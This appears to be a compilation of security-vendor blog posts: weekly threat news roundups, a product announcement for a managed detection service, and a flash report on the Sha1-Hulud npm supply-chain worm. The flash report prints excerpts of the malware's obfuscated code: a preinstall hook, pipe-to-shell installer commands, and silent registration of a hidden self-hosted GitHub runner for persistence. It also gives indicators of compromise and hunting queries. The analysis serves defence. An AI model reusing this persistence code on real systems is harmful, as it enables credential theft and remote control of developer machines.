The FBI has issued a PSA about a sharp rise in account takeover (ATO) fraud, with cybercriminals impersonating financial institutions to steal more than $262 million since January 2025. The agency’s Internet Crime Complaint Center (IC3) has received over 5,100 reports this year from victims across individuals, businesses, and organizations across every sector.

The schemes start off with deceiving victims through texts, calls, and emails, posing as bank staff or customer support. They trick targets into revealing their login credentials, multi-factor authentication (MFA) codes, or one-time passcodes (OTPs). Criminals have also been luring victims onto phishing websites engineered to mimic legitimate banking or payroll sites, sometimes boosted through SEO poisoning to appear at the top of search results.

Once inside the victim’s account, fraudsters reset passwords, lock out the rightful owners, and quickly transfer funds into crypto-linked accounts, which makes recovery extremely difficult. Some victims report being manipulated with fabricated claims of fraudulent purchases, or even firearm transactions to incite panic, before being redirected to a second scammer impersonating law enforcement.

As we enter the holiday season, the FBI urges consumers and organizations to monitor their accounts closely, use strong unique passwords, enable MFA, verify URLs, and avoid visiting personal banking sites through search engine results. Victims should immediately contact their financial institutions to request recalls and provide indemnification documents, and then file detailed reports with IC3.

Officials and security experts stress that most ATO cases stem from compromised credentials. Stronger identity verification such as passwordless authentication and enabling manual verification steps remain basic security hygiene necessary for reducing these types of attacks.

The Ugly | OpenAI Alerts API Users After Mixpanel Breach Exposes Limited Data

OpenAI is alerting some ChatGPT API customers that limited personally identifiable information (PII) was exposed after its third-party analytics provider, Mixpanel, was breached. The compromise, stemming from an smishing campaign detected on November 8, affected “limited analytics data related to some users of the API”, but did not compromise ChatGPT or other OpenAI products.

While OpenAI confirmed that sensitive information such as credentials, API keys, requests, and usage data, payment and chat details, or government IDs remained secure, the exposed data may include usernames, email addresses, approximate user location, browser and operating system details, referring websites, and account or organization IDs.

OpenAI said users do not need to reset passwords or regenerate API keys. Some users have reported that CoinTracker, a cryptocurrency tracking platform, may also have been affected, with limited device metadata and transaction counts exposed.

Has @mixpanel not disclosed this breach? Sent from @CoinTracker. pic.twitter.com/xk9nmGVmfm

— Daniel Harrison (@danielh9277) November 27, 2025

OpenAI has begun an investigation, removed Mixpanel from production services, and is notifying affected users directly. The company warns that the leaked data could be used for phishing or social engineering attacks and advises users to verify any messages claiming to relate to the incident, enable MFA, and to never share account credentials via email, text, or chat.

Mixpanel, in turn, has responded to the incident by securing accounts, revoking active sessions, rotating compromised credentials, blocking the threat actor’s IPs, resetting employee passwords, and implementing new controls to prevent future incidents. The analytics firm also reached out to all impacted customers directly.

The incident highlights the risks posed by third-party service providers and the importance of awareness against phishing, even when no core systems or highly sensitive information are directly compromised.

Shai-Hulud Worm 2.0 is a major escalation of the NPM supply chain attack, now executing in the preinstall phase to harvest credentials across AWS, Azure, and GCP and establish persistence via GitHub Actions.

The following SentinelOne Flash Report was sent to all SentinelOne customers and partners on Tuesday, November 25, 2025. It includes an in-depth analysis of the new variant’s tactics, our real-time detection posture, and the critical, immediate actions required to secure your environment.

---

Sha1-Hulud: The Second Coming

Document Type: Wayfinder Flash Report	TLP: Green
Date of Publication: 25 November 2025	Cyber Risk Rating: High
Date of Research: 24 November 2025	Referenced Threat Activity: Supply chain attacks

Key Takeaways

• A new wave of compromised NPM packages is leading to wide-scale supply chain attacks.
• This attack shows additional capabilities compared to previous attacks.
• Victims should immediately change their tokens and secrets, including those associated with any affected cloud environment.

Technical Details

Overview

“Sha1-Hulud” is the name of an ongoing NPM supply chain attack which started as early as November 21, 2025 according to public information. The new attack is similar to the previous “Shai Hulud”, but includes additional features and is triggered by different compromised packages. The name of the new attack comes from the malware author’s description inside the GitHub repository with the exfiltrated data:

While the attacks share similarities, the new attack is slightly different from the previous one and it is not yet known if both attacks come from the same threat actor.

The current attacks have impacted several popular packages such as:

• Postman
• Zapier
• AsyncAPI

A comprehensive list of affected packages can be found here.

Execution & Persistence

Unlike the previous attack, which used “postinstall” to trigger the malware execution, the “Sha1-Hulud” attack utilizes “preinstall” to execute the malware:

...

"scripts": {

"preinstall": "node setup_bun.js"

}

...

}

The malware downloads the legitimate “bun” tool to orchestrate the current attack:

async function downloadAndSetupBun() {

try {

let command;

if (process.platform === 'win32') {

// Windows: Use PowerShell script

command = 'powershell -c "irm bun.sh/install.ps1|iex"';

} else {

// Linux/macOS: Use curl + bash script

command = 'curl -fsSL https://bun.sh/install | bash';

}

…

const environmentScript = path.join(__dirname, 'bun_environment.js');

if (fs.existsSync(environmentScript)) {

runExecutable(bunExecutable, [environmentScript]);

} else {

process.exit(0);

}

The file “bun_environment.js” is an obfuscated JavaScript malware being added to the compromised packages in the “Sha1-Hulud” attack.

This script creates additional files such as “cloud.json”, “contents.json”, “environment.json”, and “truffleSecrets.json” for exfiltration and “discussion.yaml” for persistence.

The payload then registers the infected machine as a self-hosted runner named “SHA1HULUD”:

let _0x449178 = await this.octokit.request("POST /repos/{owner}/{repo}/actions/runners/registration-token", {

'owner': _0x349291,

'repo': _0x2b1a39

});

if (_0x449178.status == 0xc9) {

let _0x1489ec = _0x449178.data.token;

if (a0_0x5a88b3.platform() === 'linux') {

await Bun.$`mkdir -p $HOME/.dev-env/`;

await Bun.$`curl -o actions-runner-linux-x64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();

await Bun.$`tar xzf ./actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");

await Bun.$`RUNNER_ALLOW_RUNASROOT=1 ./config.sh --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();

await Bun.$`rm actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");

Bun.spawn(["bash", '-c', "cd $HOME/.dev-env && nohup ./run.sh &"]).unref();

} else {

if (a0_0x5a88b3.platform() === "win32") {

await Bun.$`powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-win-x64-2.330.0.zip -OutFile actions-runner-win-x64-2.330.0.zip"`.cwd(a0_0x5a88b3.homedir());

await Bun.$`powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"actions-runner-win-x64-2.330.0.zip\", \".\")"`.cwd(a0_0x5a88b3.homedir());

await Bun.$`./config.cmd --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir()).quiet();

Bun.spawn(["powershell", '-ExecutionPolicy', "Bypass", "-Command", "Start-Process -WindowStyle Hidden -FilePath \"./run.cmd\""], {

'cwd': a0_0x5a88b3.homedir()

}).unref();

} else {

if (a0_0x5a88b3.platform() === "darwin") {

await Bun.$`mkdir -p $HOME/.dev-env/`;

await Bun.$`curl -o actions-runner-osx-arm64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();

await Bun.$`tar xzf ./actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");

await Bun.$`./config.sh --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();

await Bun.$`rm actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + '/.dev-env');

Bun.spawn(["bash", '-c', "cd $HOME/.dev-env && nohup ./run.sh &"]).unref();

}

}

}

For persistence, the malware adds a workflow called “.github/workflows/discussion.yaml” that contains an injection vulnerability, allowing the threat actor to write a specially crafted message in the repository discussions section. Subsequently, the message executes code on the infected host registered as a runner.

Impact & Objectives

Unlike previous attacks that only targeted the software development environment, this attack also steals AWS, GCP, and Azure secrets that could allow the threat actor to move laterally across the cloud environment. Such information is saved to the “cloud.json” file:

The base64 in Fig. 3 translates to the following:

{"aws":{"secrets":[]},"gcp":{"secrets":[]},"azure":{"secrets":[]}}

The creation of the file does not necessarily mean that the cloud secrets have been stolen as the config can be empty.

The threat actor is also using Trufflehog in this new attack to steal secrets related to the development environment such as GitHub and NPM secrets and tokens – a similar tactic seen in the previous “Shai-Hulud” attack.

While the exact motives of the attackers are currently unknown, successful infection is resulting not only in the theft of intellectual property and private code, but also cloud secrets that could allow a broader breach across a cloud environment. The persistence capabilities allow the threat actor to execute malicious code on the infected host, which is an asset within the development environment of the victim.

SentinelOne Detection Capabilities

Endpoint Protection (EPP)

SentinelOne EPP behavioral AI engines continuously monitor for suspicious activities associated with supply chain attacks and worm propagation, including:

• Execution of malicious scripts and packages
• Unauthorized file modifications in CI/CD workflows
• Privilege escalation and credential abuse
• Suspicious runtime installations and network-based script execution

Platform Detection Rules

The SentinelOne Platform Detection Library includes rules to detect Shai-Hulud worm activity across multiple attack stages:

• Potential Malicious NPM Package Execution – Detects execution of known malicious npm packages used by Shai-Hulud
• Shai-Hulud Worm Workflow File Write Activity – Identifies unauthorized modifications to GitHub Actions workflows and malicious payload deployment
• Shai-Hulud Bun Runtime Installation via Network Fetch – Catches suspicious Bun runtime installations via remote script execution
• Shai-Hulud Unattended GitHub Runner Registration – Detects automated registration of self-hosted GitHub runners with malicious characteristics

Threat Hunting

The Wayfinder Threat Hunting team is proactively hunting, leveraging threat intelligence associated with this emerging threat. If any suspicious activity is identified in your environment, we will notify your organization’s designated escalation contacts immediately.

Recommendations

Wayfinder Threat Hunting provides the following recommendations for immediate action and strategic mitigation:

1. Enable the relevant Platform Detection Rules from the section above.
2. Enable Agent Live Security Update for real-time updates.
3. Remove and replace compromised packages.
4. Pin package versions where possible.
5. Disable npm postinstall scripts in CI where possible.
6. Revoke and regenerate npm tokens, GitHub secrets, SSH keys, and cloud provider credentials.
7. Enforce hardware-based MFA for developer and CI/CD accounts.

Tactical Tools for HuntOps

IOCs (Indicators of Compromise)

Type	Value	Description
SHA1	3d7570d14d34b0ba137d502f042b27b0f37a59fa	bun_environment.js
SHA1	d60ec97eea19fffb4809bc35b91033b52490ca11	bun_environment.js
SHA1	8de87cf4fbdd1b490991a1ceb9c1198013d268c2	bun_environment.js
SHA1	f37c6179739cf47e60280dd78cb1a86fd86a2dcf	bun_environment.js
SHA1	91429fbfef99fa52b6386d666e859707a07844b2	bun_environment.js
SHA1	ba08d2fcc6cd1c16e4022c5b7af092a4034ceedc	bun_environment.js

Hunting Queries

Query 1: SHA1HULUD Runner Execution

dataSource.name = 'SentinelOne' and event.type = 'Process Creation' and src.process.cmdline contains '--name SHA1HULUD' and src.process.cmdline contains '--unattended --token '

Query 2: SHA1HULUD Malicious JS

dataSource.name = 'SentinelOne' AND tgt.file.sha1 in ("3d7570d14d34b0ba137d502f042b27b0f37a59fa","d60ec97eea19fffb4809bc35b91033b52490ca11","8de87cf4fbdd1b490991a1ceb9c1198013d268c2","f37c6179739cf47e60280dd78cb1a86fd86a2dcf","91429fbfef99fa52b6386d666e859707a07844b2","ba08d2fcc6cd1c16e4022c5b7af092a4034ceedc") and src.process.name contains 'node'

Query 3: Suspicious “bun_environment.js” Files Potentially Linked to SHA1HULUD

dataSource.name = 'SentinelOne' AND tgt.file.size>7000000 AND (tgt.file.path contains '/bun_environment.js' or tgt.file.path contains '\\bun_environment.js') AND !(tgt.file.sha1 in ("3d7570d14d34b0ba137d502f042b27b0f37a59fa","d60ec97eea19fffb4809bc35b91033b52490ca11","8de87cf4fbdd1b490991a1ceb9c1198013d268c2","f37c6179739cf47e60280dd78cb1a86fd86a2dcf","91429fbfef99fa52b6386d666e859707a07844b2","ba08d2fcc6cd1c16e4022c5b7af092a4034ceedc"))

This is an era defined by relentless pressure on cybersecurity professionals. As environments and attack surfaces have expanded, endpoint, cloud, identity, and now AI signals continue to pile up faster than teams can interpret them. Meanwhile, rapidly evolving TTPs, fueled by ransomware-as-a-service (RaaS) and other off-the-shelf tooling have enabled motivated threat actors to move with the sophistication and speed of the most advanced nation state adversaries.

With defenders stretched thin, actors are using these advanced techniques to hide behind operational noise. And, while handling alert fatigue isn’t enough, even mature teams can struggle to confront advanced persistent threats, especially those that specialize in evasion and long-term access.

Addressing these new realities requires reimagining defenses – new strategies to unify signals, eliminate the noise, augment human capacity, and truly prepare for incidents long before they happen. This requires more than just better tools. It requires a full shift in how detection and response is delivered.

That shift is SentinelOne’s Wayfinder Threat Detection and Response (Wayfinder TDR), now generally available (GA).

Our Ethos | Defense Through AI, Intelligence & Human Experts

Wayfinder TDR is built on a foundational belief: True cyber resilience emerges from the fusion of AI, intelligence, and world-class human expertise – not from any single component in isolation.

Modern adversaries evolve too quickly, hide too effectively, and move too fluidly for traditional service models to keep up. Automated systems can miss subtle behaviors and human teams alone cannot keep pace with the scale of telemetry, meaning generic threat feeds are no longer the right solution. True defense requires three pillars working in concert.

Intelligence provides the early warning – timely, curated, contextual insight into an attacker’s behavior and tactics. SentinelOne integrates Google Threat Intelligence (GTI), one of the most powerful and comprehensive intelligence sources in the world, directly into every part of Wayfinder. It delivers a level of global threat visibility previously available only to a small set of elite organizations. This data is combined with our SentinelOne intelligence for an unparalleled set of threat content previously unseen in cybersecurity.

AI then transforms that intelligence and raw telemetry into actionable outcomes. SentinelOne’s industry-leading Purple AI engine automates triage, accelerates investigation, enriches findings with context, and closes the gap between detection and action. AI allows Wayfinder experts to cut through overwhelming volumes of data and surface what actually matters to the operation.

Finally, human expertise applies the experience and ingenuity to understand and act on what’s uncovered. Across 16 countries, SentinelOne’s team of threat hunters, analysts, incident responders, and strategic advisors bring decades of hands-on experience with the world’s most sophisticated adversaries. This combined knowledge closes gaps that machines alone cannot see, validating ambiguous signals and guiding customers through moments of uncertainty with clarity and confidence.

Wayfinder deepens this philosophy by combining elite human expertise with agentic, AI-powered threat hunting and investigations. This multi-layered human and AI model brings a level of defense that neither humans nor machines can achieve alone. We believe that the future of AI security is one that elevates – rather than replaces – human defenders, arming them with the speed of automation and the insights of global intelligence.

Our Portfolio | Tailored Protection & Elite Expertise

Wayfinder Threat Detection & Response is a unified portfolio designed to meet organizations where they are. From automated hunting and 24/7/365 MDR to high-touch advisory services during crises, each Wayfinder offering can either stand alone, or bring a comprehensive and adaptive defense program together.

These services deliver end-to-end coverage across preparation, detection, investigation, response, and recovery, ensuring customers are supported through every phase of the threat lifecycle.

Wayfinder Threat Hunting

Threat hunting is the foundation of the portfolio, delivering always-on, fully automated hunts powered by GT, SentinelOne’s threat intelligence, and enriched by SentinelOne experts. It continuously scans customer environments for emerging attacker infrastructure, high-confidence indicators of compromise, and evolving techniques.

Wayfinder Threat Hunting is unique in that it requires no manual tuning, no scheduled queries, and no analyst scripting. Intelligence updates stream directly into the system and are matched against customer telemetry with contextual attribution – threat actor, campaign, and MITRE mapping all included. Findings immediately feed into MDR workflows for rapid investigation and response.

This eliminates blind spots that attackers rely on and brings dynamic, intelligence-led coverage to every organization, regardless of staffing or maturity level.

Wayfinder MDR Essentials

MDR Essentials delivers enterprise-grade, always-on XDR coverage across endpoints, cloud environments, identity providers, and supported partner services. It provides continuous monitoring, triage, investigation, and response, powered by SentinelOne analysts, AI-driven inference, and threat hunting insights. Using curated intelligence from both SentinelOne’s AI-driven alerting and triage and Google Threat Intelligence, get rapid insight and protection at scale.

MDR Essentials is built for organizations that want strong, immediate defense without operational complexity. Onboarding and activation are simple and swift while coverage is unified through the Singularity Platform. Customers benefit from 24/7 protection, rapid containment, and detailed guidance without needing to expand internal teams.

With MDR Essentials, organizations finally get the confidence that cyber experts are watching every signal, every hour, across every critical surface.

Wayfinder MDR Elite

Wayfinder MDR Elite extends the Essentials experience with a premium, high-touch operating model for organizations that are looking for deeper partnership, strategic alignment, and more proactive readiness and response. Every MDR Elite customer receives a dedicated Threat Advisor, an expert who becomes embedded in their security program, and offers hands-on guidance, operational reviews, and tailored risk management recommendations.

Elite also provides bundled access to SentinelOne’s DFIR specialists, enabling advanced investigations, malware analysis, and targeted forensics. As well, Elite customers receive a built-in Incident Readiness & Response (IRR) retainer, ensuring they have pre-approved hours available for compromise assessments, breach simulations, preparedness workshops, and expert counsel during major incidents.

For teams that want not just coverage but clarity, Elite becomes a trusted extension of their leadership and decision-making process.

Wayfinder Incident Readiness & Response

Wayfinder IRR creates a foundation of preparedness that many organizations simply do not have today. With a renewable pool of hours, customers can proactively strengthen their posture or engage experts during high-pressure moments.

The key to this offering is flexibility. Use those hours to get immediate, 24/7/365 access to elite DFIR specialists that respond effectively and compliantly to critical incidents. Or use hours for breach readiness exercises and compromise assessments to uncover hidden risks and improve your security posture and readiness.

Wayfinder IRR experts act as a trusted partner who can guide organizations through high-pressure moments before, during, and after a breach to build confidence, clarity, and resilience. Expert-led exercises, simulations, and advisory services will transform theoretical security plans into reliable, tested incident response capabilities. And when incidents do occur, our team will not only contain, investigate, and stop the breach in its tracks, but will reconstruct attacker activity to understand the “how” and “what” of an incident, identifying compromised accounts, exfiltrated data, and affected systems.

Wayfinder Emergency Response

For organizations experiencing an active breach without a retainer in place, Wayfinder Emergency Response provides urgent access to a 40-hour block of DFIR expertise. It enables rapid containment, adversary eviction, hands-on investigation, and guidance during critical situations.

Our experts’ deep platform expertise speeds investigations and delivers critical evaluations such as rapid Root Cause Analysis, malware reverse engineering, IOC analysis, and more. With Wayfinder Emergency Response, achieve complete incident control with rapid threat containment, root cause analysis, and privileged, counsel-driven investigative support with defensible reporting. This ensures that all organizations have an expert-led lifeline supported by AI-driven analysis and Google-enhanced intelligence during the most critical moments.

Our Vision | Redefining Managed Services for the AI Era

For years, organizations have been forced to choose between generic intelligence feeds, siloed MDR services, and incomplete incident response retainers. These make for complex in-house responsibilities since point solutions only offer bolt-ons rather than cohesive strategies. AI was under utilized. Human expertise was expensive, inconsistent, or inaccessible. We set out to eliminate the fragmentation that leaves so many organizations exposed.

SentinelOne’s Wayfinder TDR services break that cycle by unifying agentic AI, elite human operators, and unmatched threat intelligence insights into a single, adaptive defense fabric. The result? A portfolio that not only responds to threats but proactively seeks them out, contextualizes them, and then empowers organizations to act with precision and speed.

It stands alone in merging together the deep integration of GTI, operational automation driven by AI, and the global scale of human expertise. Instead of stitching together disparate solutions, Wayfinder is purpose-built to streamline telemetry, intelligence, and human insight into a coherent defense program.

This shift matters as modern adversaries are no longer linear nor predictable – they’re fluid. They adapt rapidly. And, they exploit operational complexity. To reduce that complexity, Wayfinder closes detection gaps and reduces the noise while ensuring that experts are available before, during, and after any incident.

This is a fundamental redefinition of what managed security can achieve when human ingenuity and agentic AI move in sync. Aligning intelligence, technology, and human judgment in a single adaptive defense, Wayfinder raises the bar for what true managed security must deliver.

Conclusion | Proactive & Scalable Defense Starts Now

The future of cybersecurity belongs to organizations that can see farther ahead, move faster, and act with confidence. Attackers are only becoming more automated and opportunistic, meaning SOCs need more than tools – they need a combination of the right intelligence translated by trusted experts and partnership when incidents arise.

As announced at OneCon 2025, Wayfinder joins human expertise, agentic AI, and Google Threat Intelligence to deliver a multi-layered human + AI defense model that helps customers fill in their skill gaps, elevate teams, and strengthen their posture immediately.

Wayfinder TDR is the next evolution of SentinelOne’s services portfolio, combining threat hunting, managed detection, and incident response into a force multiplier to empower organizations in regaining control and reducing daily risk.

Shift the advantage back to the defending side with Wayfinder – watch an overview here and book a demo to get started.

The Good | Courts Prosecute DPRK Fraud, Ransomware Hosting & Crypto Mixer Ops

Five people have pleaded guilty to helping the DPRK run illicit revenue schemes involving remote IT worker fraud and cryptocurrency theft. The group enabled North Korean operatives to obtain U.S. jobs using false or stolen identities, generating over $2.2 million while impacting 136 companies. The DOJ is also seeking forfeiture of $15 million tied to APT38 cyber-heists. The defendants, Oleksandr Didenko, Erick Prince, Audricus Phagnasay, Jason Salazar, and Alexander Travis, admitted to stealing U.S. identities for overseas workers and laundering stolen funds.

In the U.S., U.K., and Australia, authorities have issued a coordinated sanction against Russian bulletproof hosting (BPH) providers that enable ransomware groups by leasing servers to support malware delivery, phishing attacks, and illicit content hosting. To help cybercriminals evade capture, BPH services ignore abuse reports and law enforcement takedowns. OFAC has sanctioned Media Land, its sister companies, and three executives all tied to LockBit, BlackSuit, Play, and other threat groups. Five Eyes agencies also released guidance to help ISPs detect and block malicious infrastructure used by BPH services.

Our joint guidance on bulletproof hosting providers highlights best practices to mitigate potential cybercriminal activity, including recommended actions that ISPs can implement to decrease the usefulness of BPH infrastructure. Learn more https://t.co/cGQpuLpBPP pic.twitter.com/tM55acfuQv

— CISA Cyber (@CISACyber) November 19, 2025

The founders of Samourai Wallet, a cryptocurrency mixing service, have been sentenced to prison for laundering over $237 million. Operating since 2015, Samourai used its ‘Whirlpool’ mixing system and ‘Ricochet’ multi-hop transactions to obscure Bitcoin flows. These features made tracing more difficult and enabled criminals involved in darknet markets, drug trafficking, and cybercrime to launder more than $2 billion. Authorities seized the platform, including its servers, domains, and mobile app, while the founders agreed to forfeit all traceable proceeds. CEO Keonne Rodriguez has received five years, while CTO William Lonergan Hill received four along with supervised release. The pair were ordered to pay fines of $250,000 each.

The Bad | DPRK Actors Build Fake Job Platform to Lure AI Talent & Push Malware

As part of their ongoing and evolving Contagious Interview campaign, DPRK-based threat actors have created a fake job platform designed to compromise legitimate job seekers, particularly in the AI research, software development, and cryptocurrency verticals. While earlier fraudulent IT-worker schemes relied on targeting individuals through phishing on social media platforms, the latest tactic weaponizes a fully functional hiring pipeline.

Researchers discovered the latest lure – a Next.js-based job portal hosted at lenvny[.]com, complete with dozens of fabricated AI and crypto-industry job listings. The listings mimic branding from major tech companies and feature a polished UI and full recruitment workflow that mirrors modern hiring systems, encouraging applicants to submit resumes and professional links before prompting them to record a video introduction.

This final step triggers the DPRK-favored ClickFix technique: When applicants copy the fake interview instructions, a hidden clipboard hijacker swaps their text with a multi-stage malware command. When pasted into a terminal, it downloads and executes staged payloads under the guise of a “driver update”, ultimately launching a VBScript-based loader. This design blends seamlessly with typical remote-work interview processes and dramatically increases the likelihood of accidental execution.

The platform also performs strategic filtering, attracting AI and crypto professionals specifically as their skills, network access, and workstation devices tend to align with DPRK’s intelligence and financial priorities including model-training infrastructure to crypto exchange systems. The campaign reflects significant maturation in DPRK social engineering tradecraft, pairing high-fidelity UI design with covert malware delivery. Job seekers are advised to verify domains, avoid off-platform hiring systems, and execute any requested code only in sandboxed environments.

The Ugly | Iran-Backed Actors Weaponize Cyber Recon to Power Real-World Attacks

Iranian-linked threat actors are using cyber operations to support real-world military activity, a pattern described by researchers as “cyber-enabled kinetic targeting”.

In the past, conventional security models separated cyber and physical domains – delineations that are proving artificial in today’s socioeconomic and political climate. Now, these are not just cyber incidents that cause physical impact, but rather coordinated campaigns upon which digital operations are built to advance military objectives.

One example involves Crimson Sandstorm (aka Tortoiseshell and TA456), a group tied to Iran’s Islamic Revolutionary Guard Corps (IRGC). Between December 2021 and January 2024, the group probed a ship’s Automatic Identification System (AIS) before expanding their operations to other maritime platforms. On January 27, 2024, the group searched for AIS location data on one particular shipping vessel. Days later, that same ship was targeted in an unsuccessful missile strike by Iranian-backed Houthi forces, which have mounted repeated missile attacks on commercial shipping in the Red Sea amid the Israel–Hamas conflict.

A second case highlights Mango Sandstorm (aka Seedworm and TA450), a group affiliated with Iran’s Ministry of Intelligence and Security (MOIS). In May, the group set up infrastructure for cyber operations and gained access to compromised CCTV feeds in Jerusalem to gather real-time visual intelligence. Just a month later, the Israel National Cyber Directorate confirmed Iranian attempts to access cameras during large-scale attacks, reportedly to get feedback on where the missiles hit and improve precision. Both highlighted cases show the attackers’ reliance on routing traffic through anonymizing VPNs to prevent attribution.

The divide between digital intrusions and physical warfare continues to blur. With nation state groups leveraging cyber reconnaissance as a precursor for physical attacks, it is likely we will continue to see significant developments in this kind of hybrid warfare.

The Good | FBI and Europol Arrest Ransomware Broker and Dismantle Major Botnet

Russian national, Aleksey Olegovich Volkov, is set to plead guilty for acting as an initial access broker (IAB) for Yanluowang ransomware attacks targeting at least eight U.S. companies from July 2021 to November 2022.

Using aliases like “chubaka.kor” and “nets”, Volkov sold access to the ransomware group after breaching his victim’s corporate networks and demanding ransoms from $300,000 to $15 million in Bitcoin. FBI investigators traced Volkov through iCloud, cryptocurrency records, and social media, recovering chat logs, stolen credentials, and evidence of ransom negotiations, which all linked him to $1.5 million in collected payments.

His breaches affected companies across multiple states, including banks, engineering firms, and telecoms. Volkov faces up to 53 years in prison and over $9.1 million in restitution for charges including trafficking in access, identity theft, computer fraud, and money laundering.

Law enforcement agencies across several countries dismantled over 1000 servers linked to the Rhadamanthys infostealer, VenomRAT, and Elysium botnet as part of Operation Endgame, an international effort against cybercrime. Coordinated by Europol and Eurojust with support from private partners, the action consisted of searches at 11 locations in Germany, Greece, and the Netherlands, where officers seized 20 domains and arrested a key VenomRAT suspect.

The disrupted infrastructure involved hundreds of thousands of infected devices and millions of stolen credentials, including access to over 100,000 crypto wallets. Rhadamanthys, active since 2023, had seen rapid growth in late 2025, affecting thousands of IP addresses daily.

Authorities recommend checking systems for infection via politie.nl/checkyourhack and haveibeenpwned.com. Operation Endgame has previously disrupted numerous malware and ransomware networks, including Bumblebee, IcedID, Pikabot, Smokeloader, SystemBC, and Trickbot, highlighting ongoing international efforts to curb cybercrime.

The Bad | UNC6485 Exploits Triofox Vulnerability for Remote Code Execution

Threat actors have exploited a critical vulnerability in Gladinet’s Triofox file sharing and remote access platform, chaining it with the product’s built-in antivirus scanner to gain SYSTEM-level remote code execution (RCE).

The vulnerability, tracked as CVE-2025-12480, allows attackers to abuse an access control logic error that grants admin privileges when the request host equals ‘localhost’. By spoofing this value in the HTTP host header, an attacker can reach sensitive setup pages without credentials, especially on systems where the TrustedHostIp parameter was never configured.

Security researchers first discovered an intrusion in August targeting a Triofox instance running version 16.4.10317.56372. They later determined that the threat cluster UNC6485 used a malicious HTTP GET request containing a localhost header to access the AdminDatabase.aspx setup page.

Using this workflow, the attackers created a rogue administrator account called ‘Cluster Admin’, uploaded a malicious script, and configured Triofox to treat that script as the antivirus scanner path. Since the scanner inherits SYSTEM-level privileges from the parent process, this allowed the attackers to execute arbitrary code.

The payload then launches a PowerShell downloader to retrieve a Zoho UEMS installer, which subsequently deploys Zoho Assist and AnyDesk on the compromised host for remote access and lateral movement. The attackers were also observed using Plink and PuTTY to establish SSH tunnels and forward traffic to the compromised host’s RDP port.

Gladinet has since fixed CVE-2025-12480 in Triofox version 16.7.10368.56560, and administrators are urged to update to the latest release (16.10.10408.56683), review admin accounts, and ensure the antivirus engine is not configured to run unauthorized binaries.

The Ugly | Attackers Exploit Zero-Day to Steal Washington Post Employee Data

The Washington Post, one of the vendors impacted by a breach targeting Oracle software, is notifying nearly 10,000 current and former employees and contractors that their personal and financial information has been exposed in the data theft campaign.

The Post, one of the largest U.S. newspapers with 2.5 million digital subscribers, confirmed that attackers accessed parts of its network between July 10 and August 22 by exploiting a previously unknown zero-day vulnerability in Oracle E-Business Suite, the organization’s internal enterprise resource planning (ERP) system. The vulnerability is tracked as CVE-2025-61884.

According to the letter sent to affected individuals, the Post learned of the intrusion after a threat actor contacted the company on September 29 claiming access to its Oracle applications. Post-breach investigations identified the widespread flaw that allowed the attackers to access many Oracle customers’ applications. The attackers used this flaw to steal sensitive data and later attempted to extort the Post and other organizations breached in the same campaign.

Although the Post did not name the group responsible, the Cl0p ransomware operation is suspected to be behind the attacks. Other high-profile victims of the same Oracle zero-day include Harvard University, Envoy Air, and GlobalLogic, with additional impacted organizations listed on Cl0p’s leak site.

The Post’s investigation has determined that data belonging to 9,720 individuals was compromised. Exposed information includes full names, Social Security numbers, tax and ID numbers, and bank account and routing numbers. Impacted individuals have been offered 12 months of free identity protection through IDX and advised to place credit freezes on their accounts and fraud alerts for additional protection.

The Good | Authorities Crack Down on Ransomware, Crypto Fraud & DPRK Laundering Ops

Three ex-employees of cybersecurity firms DigitalMint and Sygnia have been indicted for participating in BlackCat (aka ALPHV) ransomware attacks on five U.S. companies between May and November 2023.

The defendants allegedly acted as BlackCat affiliates, breaching networks, stealing data, deploying encryption malware, and demanding cryptocurrency ransoms. Victims included medical, pharmaceutical, and engineering firms. Prosecutors say the ransom demands ranged from $300,000 to $10 million, with one company paying out $1.27 million. The trio faces up to 50 years each in prison if convicted.

Also this week, the U.S. Treasury sanctioned two North Korean financial institutions and eight individuals for laundering cryptocurrency stolen via fraudulent IT worker schemes. The designated include Ryujong Credit Bank and Korea Mangyongdae Computer Technology Company (KMCTC), along with executives and bankers responsible for managing funds linked to ransomware attacks and UN sanctions violations.

OFAC says that over the last 3 years DPRK-affiliated cybercriminals have stolen more than $3 billion in cryptocurrency using malware and social engineering. The sanctions freeze U.S. assets and warn that transactions with these entities risk secondary penalties.

In Europe, authorities have arrested nine suspects involved in a cryptocurrency fraud network responsible for stealing over €600 million ($689 million) across multiple countries. The criminals allegedly created fake crypto investment platforms that promised high returns and recruited victims through social media, cold calls, and fake endorsements from celebrity investors. Victims lost their funds while the suspects laundered the stolen assets using blockchain tools. In operations coordinated by Eurojust in Cyprus, Spain, and Germany, law enforcement seized cash, crypto, and bank accounts.

The Bad | SleepyDuck Trojan Exploits Ethereum Smart Contracts to Evade Takedown

A new remote access trojan (RAT) dubbed ‘SleepyDuck’ has been masquerading as a well-used Solidity extension on the Open VSX open-source registry, researchers say. The malware uses Ethereum smart contracts to manage its command and control (C2) communications, helping it to maintain persistence even if its main server is taken down.

Initially benign when published on October 31, the infected extension, juan-bianco.solidity-vlang, became malicious after an update made the following day, by which time it had already been downloaded 14,000 times. For now, the extension remains available on Open VSX with a public warning. In total, it has been downloaded over 53,000 times.

